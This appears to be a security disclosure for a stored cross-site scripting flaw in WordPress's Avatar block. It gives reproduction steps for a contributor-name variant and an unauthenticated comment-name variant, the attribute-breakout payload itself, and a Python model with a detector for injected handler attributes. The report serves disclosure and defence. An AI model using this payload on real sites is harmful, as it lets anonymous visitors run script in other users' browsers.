Default setup:

As a Contributor, edit your profile and enter the following payload as First Name: " autofocus onfocus=alert`XSS`//, then select the display name option that contains the payload and save.

Create or edit a post, add an Avatar block, and enable "Link to user profile" and "Open in new tab" in the block settings. Alternatively, switch to the Code Editor and add the following block markup to the post: <!-- wp:avatar {"isLink":true,"linkTarget":"_blank"} /-->

The XSS is triggered when any user views or previews the post. No interaction is needed: the injected autofocus attribute gives the element focus on page load, so the onfocus handler runs immediately.


Worse setup: "Link to user profile" and "Open in new tab" enabled on the Avatar block inside the comment template. To reproduce, open /wp-admin/site-editor.php?postType=wp_template&postId=twentytwentyfour%2F%2Fsingle, select one of the Avatar blocks in the comments section and enable both settings.

Then simply add a comment as an unauthenticated user with the following payload as the Name: " autofocus onfocus=alert`XSS`//, and enter a dummy Website URL (required for the attack to work).
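Both variants above (the contributor display name in the post, and the unauthenticated comment author name in the comment template) rely on the same mechanism: a user-controlled name lands inside a double-quoted HTML attribute without encoding. The following is an added example, not code from WordPress or from this report. It models a simplified avatar link whose title attribute carries the name (an assumption made for illustration; it does not reproduce the Avatar block's real source or which block settings reach the unescaped path), parses the result the way a tolerant HTML parser would, and shows that the payload yields an extra onfocus attribute on the vulnerable path but stays inert once the name is HTML-encoded. The URLs are constructed sample values.

```python
import html
from html.parser import HTMLParser

# Payload from the PoC: the leading double quote closes the attribute the
# name is interpolated into, autofocus makes the element receive focus on
# load, and onfocus runs the handler. The trailing // turns the leftover
# closing quote of the original attribute into a JavaScript comment.
PAYLOAD = '" autofocus onfocus=alert`XSS`//'

# Constructed sample inputs (not real accounts or sites).
PROFILE_URL = "https://example.test/author/mallory"
COMMENT_WEBSITE = "https://example.test/"


def render_avatar_link(display_name, link_url, new_tab=True, escape=False):
    """Simplified model of an avatar wrapped in an author link whose title
    attribute carries the author's name. Assumption for this example: the
    vulnerable path writes the name into a double-quoted attribute
    verbatim; the fixed path HTML-encodes it. Not the Avatar block's code."""
    if not link_url:
        # Assumption mirroring the PoC note that a Website URL is required:
        # without a URL there is no link, so no attribute to break out of.
        return '<img src="/avatar.png" alt="">'
    enc = (lambda s: html.escape(s, quote=True)) if escape else (lambda s: s)
    target = ' target="_blank"' if new_tab else ""
    return (
        f'<a href="{enc(link_url)}"{target} title="{enc(display_name)}">'
        '<img src="/avatar.png" alt=""></a>'
    )


class _AnchorCollector(HTMLParser):
    """Collect the attribute dictionaries of every <a> the parser sees."""

    def __init__(self):
        super().__init__()
        self.anchors = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.anchors.append(dict(attrs))


def anchor_attributes(markup):
    """Parse markup with a tolerant HTML parser and return the attributes
    of each anchor, which is what the browser ends up acting on."""
    parser = _AnchorCollector()
    parser.feed(markup)
    parser.close()
    return parser.anchors


def injected_handlers(markup):
    """Detection check: any on* attribute on an author link means the
    name broke out of its attribute. A legitimate avatar link has none."""
    return sorted(
        key for attrs in anchor_attributes(markup) for key in attrs
        if key.startswith("on")
    )


if __name__ == "__main__":
    # Post variant: contributor display name, link to profile + new tab.
    vuln = render_avatar_link(PAYLOAD, PROFILE_URL)
    print(vuln)
    print("injected handlers:", injected_handlers(vuln))   # ['onfocus']

    # Comment variant: unauthenticated author name plus a dummy Website URL,
    # rendered through the encoding path.
    fixed = render_avatar_link(PAYLOAD, COMMENT_WEBSITE, escape=True)
    print(fixed)
    print("injected handlers:", injected_handlers(fixed))  # []

    # Without a website there is no link to break out of in this model.
    print(injected_handlers(render_avatar_link(PAYLOAD, "")))  # []
```

Running the vulnerable path prints title="" autofocus onfocus=alert`XSS`//" inside the anchor, and the parser reports autofocus and onfocus as separate attributes, which is exactly what a browser does with the unquoted value up to the next space or closing bracket. On the encoded path the quote becomes &quot;, the parser returns the whole payload as the title value, and no handler attribute exists. The injected_handlers check is a cheap way to confirm whether a rendered page is affected without relying on the alert firing.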